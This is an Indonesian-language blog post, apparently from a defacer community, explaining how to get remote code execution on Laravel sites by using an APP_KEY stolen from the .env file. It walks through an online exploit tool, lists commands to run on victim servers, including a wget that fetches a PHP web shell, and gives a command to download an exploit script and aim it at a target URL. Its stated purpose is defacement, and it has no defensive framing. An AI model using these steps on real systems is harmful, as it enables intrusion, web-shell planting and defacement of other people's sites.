Laravel RCE dengan APP_KEY

Laravel RCE dengan APP_KEY - Baik seperti judul di atas kali ini banyak sekali saya menemukan hasil deface para defacer di grup grup... dengan berdarnya sebuh bug yang dimana kita hanya memanfaatkan APP_KEY yang di dapatkan pada file .env pada laravel untuk melakukan Deface ...



Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... ( langsung saja ke tahap exploitasi )

EXPLOITASI

Laravel RCE Via Web Apps

1. Masuk Ke https://exploit.anons79.com/ ( Tools Untuk RCE LARAVEL ini )
2. Masukan Target ( Perhatikan penggunaan http,https,www )
3. Masukan APP_KEY yang kalian dapat dari web yang rentan
4. Masukan Command ( yang sering kalian pakai di terminal ) 
5. Klik Exploit

Jika Rentan maka dia akan menampilkan output yang anda perintahkan..
berikut command nya

~ uname -a
( untuk melihat versi dari system )
~ ls ( untuk melihat folder / file pada system )
~ wget https://domain.com/shell.php ( unggah shell )

Laravel RCE via Tools

INSTALL TOOLS

wget https://raw.githubusercontent.com/wibuheker/exploit/master/php/laravel/rce.php -O lararce.php

Exploitasi


php lararce.php url=http://target/ method=1

Kalian bisa juga menggunakan appkey langsung jika mau, atau mengcustom command kalian dengan perintah pada gambar diatas.

submer : nakanonsec

thanks to : Xai Syndicate


1 comment: